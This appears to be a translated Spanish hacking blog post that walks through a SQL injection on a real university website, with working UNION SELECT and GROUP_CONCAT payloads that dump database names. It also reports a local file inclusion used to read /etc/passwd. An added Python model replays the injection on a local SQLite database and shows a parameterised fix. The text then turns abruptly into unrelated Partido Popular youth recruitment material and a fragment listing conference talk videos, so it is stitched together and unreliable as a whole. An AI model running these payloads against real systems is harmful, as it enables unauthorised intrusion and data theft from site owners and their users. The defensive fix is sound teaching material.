Not just us ... [Part III]

Continuing with the bugs in other universities, now we'll look at a couple of flaws in another website ... well, I'm not saying which university xD
The first flaw is a typical SQL injection. The vulnerable URL is:
http://palestra.??????.edu.pe/index.php?id=
where the vulnerable parameter is "id". First I tried adding a single quote to see whether an error occurred. The result was this:
Fig. 1 - The web application filters quotes.
As you can see, the application escapes the quote by prepending a backslash ("\"), so the syntax of the SQL statement does not change and no error occurs. But altering the syntax does not always require a quotation mark: numeric values need not be quoted in an SQL statement, and that is exactly the case here ;) Escaping quotes only protects values that sit inside quotes; an unquoted numeric parameter can be extended with "and ...", "order by ..." or "union select ..." without a single quote.
Using a test by contradiction (a boolean-based check) we can confirm that we really do interfere with the query.
Fig. 2 - When the condition is false, an error is shown.
Fig. 3 - When the condition is true, the item is shown.
When we inject "and 1=0" the condition is always false, no rows are selected, and the application displays an error message. When we inject "and 1=1" the condition does not change the result and the article with id 423 is shown.
Well, the vulnerability is confirmed ... Now let's play a little.
After some time playing with ORDER BY we can conclude that 17 columns are selected. The truth is that it was somewhat confusing, because the id parameter is used in 2 queries with different numbers of columns, so while one of them gives no error the other one does. Fortunately, the error in the second query does not prevent the first one from displaying its result ;) Knowing the number of columns, the next step is to see which of those fields are displayed on the page. We do this with a UNION SELECT:
/index.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23
Fig. 4 - Distribution of the displayed fields.
As the picture shows, the displayed fields are 2, 3 and 5. We can use any of them to extract information from the database ;) As a test we'll get the names of the databases that exist on the server. To do this we query the "schemata" table of "information_schema":
/index.php?id=null+union+select+1,2,3,4,schema_name,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.schemata%23
Fig. 5 - Only the first result is shown.
But note that only the first result is displayed, because the page renders a single row. To see the other results we have the following options:
- Request the names one by one using the LIMIT clause.
- Do a "Serialized SQL Injection" and display many of the names in a single query ;)
LIMIT we have already explained before, so this is a good excuse to learn something new. Serialized SQL Injection is a technique that lets us show many results of a query in a single visible field. It is done with different functions depending on the database engine (Oracle, SQL Server, MySQL, etc.). In the case of MySQL you use "GROUP_CONCAT", which concatenates the results belonging to the same group into one string.
The serialized query would look like this:
/index.php?id=null+union+select+1,2,3,4,GROUP_CONCAT(schema_name+separator+0x20),6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.schemata%23
Fig. 6 - Serialized query.
The GROUP_CONCAT function lets you specify a separator. In this case we use "0x20" as the separator, which is just a space encoded in hexadecimal, so we don't have to use quotes (which the application would escape) ;)
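The whole chain above (quote escaping that does not protect an unquoted numeric parameter, the "and 1=1" / "and 1=0" test, counting columns with ORDER BY, the UNION SELECT into a displayed field, and the serialized GROUP_CONCAT variant) as an added, runnable model. This is example code written for this page, not the post's own payloads or the site's code: SQLite stands in for the site's MySQL (so sqlite_master plays the role of information_schema.schemata and char(32) is the quote-free space where the post uses 0x20), and the table and column names, the 17-column layout and the row with id 423 are constructed here. The hardened lookup beside the vulnerable one shows why a bound parameter stops the injection that escaping did not.

```python
# Added example (not code from the post): a small SQLite model of the injection
# described above. Assumptions: SQLite stands in for the site's MySQL, the table
# and column names are invented, and the row with id 423 is constructed here.
import sqlite3

NCOLS = 17            # number of selected columns, as found with ORDER BY
VISIBLE = (2, 3, 5)   # fields the page displays, per Fig. 4 (1-based)


def build_db():
    """Constructed sample database: a 17-column article table plus one more table."""
    conn = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i} TEXT" for i in range(2, NCOLS + 1))
    conn.execute(f"CREATE TABLE articulos (id INTEGER PRIMARY KEY, {cols})")
    conn.execute("CREATE TABLE usuarios (id INTEGER PRIMARY KEY, login TEXT, clave TEXT)")
    vals = ", ".join(f"'v{i}'" for i in range(2, NCOLS + 1))
    conn.execute(f"INSERT INTO articulos VALUES (423, {vals})")
    return conn


def addslashes(s):
    """The quote escaping seen in Fig. 1 (PHP addslashes / magic_quotes style)."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def vulnerable_lookup(conn, raw_id):
    """Quotes are escaped, but the value is concatenated unquoted: still injectable."""
    sql = "SELECT * FROM articulos WHERE id = " + addslashes(raw_id)
    return conn.execute(sql).fetchall()


def safe_lookup(conn, raw_id):
    """Hardened form: the value is bound as a parameter and never parsed as SQL."""
    return conn.execute("SELECT * FROM articulos WHERE id = ?", (raw_id,)).fetchall()


def render(rows):
    """The page shows only fields 2, 3 and 5 of the first row; None = error page."""
    if not rows:
        return None
    return {n: str(rows[0][n - 1]) for n in VISIBLE}


def is_injectable(conn, id_value):
    """Boolean test of Figs. 2-3: 'and 1=1' keeps the article, 'and 1=0' loses it."""
    true_case = render(vulnerable_lookup(conn, f"{id_value} and 1=1"))
    false_case = render(vulnerable_lookup(conn, f"{id_value} and 1=0"))
    return true_case is not None and false_case is None


def count_columns(conn, id_value, limit=64):
    """ORDER BY n fails once n exceeds the number of selected columns."""
    for n in range(1, limit + 1):
        try:
            vulnerable_lookup(conn, f"{id_value} order by {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_payload(expr, column, from_clause):
    """null union select 1,...,17 from <table>, with expr placed in a visible column."""
    fields = [str(i) for i in range(1, NCOLS + 1)]
    fields[column - 1] = expr
    return f"null union select {','.join(fields)} from {from_clause}"


def extract(conn, expr, from_clause, column=5):
    """Run a UNION payload and read back whatever landed in the chosen visible field."""
    shown = render(vulnerable_lookup(conn, union_payload(expr, column, from_clause)))
    return None if shown is None else shown[column]


def list_tables_serialized(conn):
    """Serialized injection: every table name in one field. char(32) is a space
    written without quotes; the post's MySQL payload uses 0x20 for the same reason
    (GROUP_CONCAT(schema_name SEPARATOR 0x20) FROM information_schema.schemata)."""
    return extract(conn, "group_concat(name, char(32))", "sqlite_master")


def demo():
    """Run the whole chain against the constructed database and return the findings."""
    conn = build_db()
    return {
        "injectable": is_injectable(conn, 423),
        "columns": count_columns(conn, 423),
        "first_table": extract(conn, "name", "sqlite_master"),   # Fig. 5: one result
        "all_tables": list_tables_serialized(conn),              # Fig. 6: all of them
        "safe_rows": len(safe_lookup(conn, "423 and 1=1")),      # bound value: no match
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it as a script to see each step's result. The only change between the vulnerable and hardened lookup is that the hardened one binds the value instead of concatenating it, which is the fix the site needed; escaping quotes on its own does nothing for a parameter that is never inside quotes.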
The second vulnerability found on this site is an LFI. Yes, the same kind of vuln that was explained in the first part. And as you know, SQLi + LFI is a very dangerous combination: with the "FILE" privilege an attacker can write code to disk with "INTO OUTFILE" and then include it through the LFI. Fortunately for the site admin, the database user does not have the "FILE" privilege, so that route is closed here. I leave you an image showing the file "/etc/passwd" as proof of concept:
Fig. 7 - PoC of the LFI.
That's all ... for today. Greetings.
Need reasons? The presentation surprised us all, given the hype that had been building on social networks etc. before the starting gun was fired at headquarters. There is little I can say about those who criticize us, because with their own words they describe themselves very well ... these threats, this attempt to silence us or push us aside through ridicule, only push those of us who are supporting and contributing our two cents to do so even more. But perhaps there are people who need reasons to join, who are missing a little push to be convinced; I hope the following lines convince you. Join the PP: Because it is a party with its feet on the ground, avoiding radical ideas. Because we do not want a nation of the unemployed, but a country of entrepreneurs, of people who work. Because people are the focus of its policy. Because we do not accept "that the socialist international policy has led Spain to the third division of Europe. I am not resigned to the nationalists, with a tiny percentage of the votes, ending up dictating Spanish policy." Because we want to discover the truth about 11-M, the negotiation with ETA etc., since we give no quarter to murderers. Because it defends the Spain of progress, freedom and equality, the Spain of solidarity, tolerance and cutting-edge individual initiative. Because we do not resign ourselves to "stop denouncing the sectarianism of the Tinell Pact and the profoundly undemocratic attitude of the PSOE, whose policy in the Basque elections of 2001 had the sole aim of stigmatizing our Party and its members, supporters and voters." Because we do not want our country to be a hindrance to Europe, but part of its locomotive. For this and much more, if you believe in individual autonomy and equal citizenship, join! In NNGG there are many young people like you. And of course, feel free to visit afiliatealPP.com
Nuevas Generaciones presented its Ciudad Lineal membership campaign on March 10, 2011 with a large attendance at the district headquarters, highlighted by the presence of Alcayde Germain, Secretary of NNGG Madrid. This campaign, which has already borne much fruit, aims to get the district's young people to mobilize and take part in improving and maintaining the district and the city, showing that young people are not the "liberals" who raise a closed fist while defending the Republic. In the coming weeks we will show that young people are not with Che, Chávez or ZP. No, young people are with those who make people the basis of their policies, in the case of Madrid, Esperanza Aguirre and Alberto Ruiz Gallardón. Indeed, as Germain told us during the wonderful evening he spent chairing our Executive Committee, now more than ever is the time to mobilize young people so that the municipal elections become the beginning of the end of ZP and the stale socialism that has plunged the country into a crisis that the Partido Popular will have to resolve. But the evening did not stop there. The Executive Committee also presented its work so far, presenting all the platforms NNGG has fully operational to meet the goal of being present everywhere in a serious and determined way. Thus we presented the new look of the website (http://www.nnggclineal.org/) and blog (http://clineal.blogspot.com/), and detailed our presence on the most important social networks (Tuenti, Facebook, Twitter ...). After all the presentations there was an open question time, where perhaps we should highlight the involvement of a member who asked Germain about immigrants in Madrid and the party's handling of this issue. He recalled that the Community of Madrid was the first region of Spain to create an immigration advisory service, among other things.
He also explained that the party's concern for immigrants is evident, and can be seen in the case of our district through the coordination our president Sonsoles maintains with associations of foreigners in Ciudad Lineal.
Not just us ... [Part II]
Hello ... for those who could not attend for whatever reason, and for those who want to watch the talks again with a bit more patience, I'll leave the videos of all the LimaHack @ UNMSM talks in this post.
I'll update the post as I upload more videos.
PhD in Metasploit exploitation
Mom: I want to be a Reverse Engineer
Lockpicking 101
Toppling Tux ... Creating exploits for Linux